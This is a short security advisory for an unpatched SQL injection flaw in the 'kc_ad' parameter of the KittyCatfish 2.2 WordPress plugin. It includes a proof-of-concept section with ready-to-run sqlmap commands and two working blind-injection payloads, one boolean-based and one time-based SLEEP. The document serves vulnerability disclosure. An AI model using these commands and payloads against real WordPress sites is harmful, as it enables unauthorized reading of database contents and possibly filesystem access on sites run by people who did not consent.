1. Description

An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.

The get oarameter 'kc_ad' is vulnerable.

2. Proof of concept

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""  —dbms —threads=10 —random-agent

OR

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql   —level 5 —risk=3
  
Parameter: kc_ad (GET)
  
    Type: boolean-based blind
  
    Title: AND boolean-based blind - WHERE or HAVING clause
  
    Payload: kc_ad=31 AND 2281=2281&ver=2.0
  
   
  
    Type: AND/OR time-based blind
  
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  
    Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0

3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

4. Impact

Critical

5. Affected versions

<= 2.2 6. Disclosure timeline 06-Mar-2017 - found the vulnerability 06-Mar-2017 - informed the developer 20-Mar-2017 - release date of this security advisory Not fixed at the date of submitting this exploit.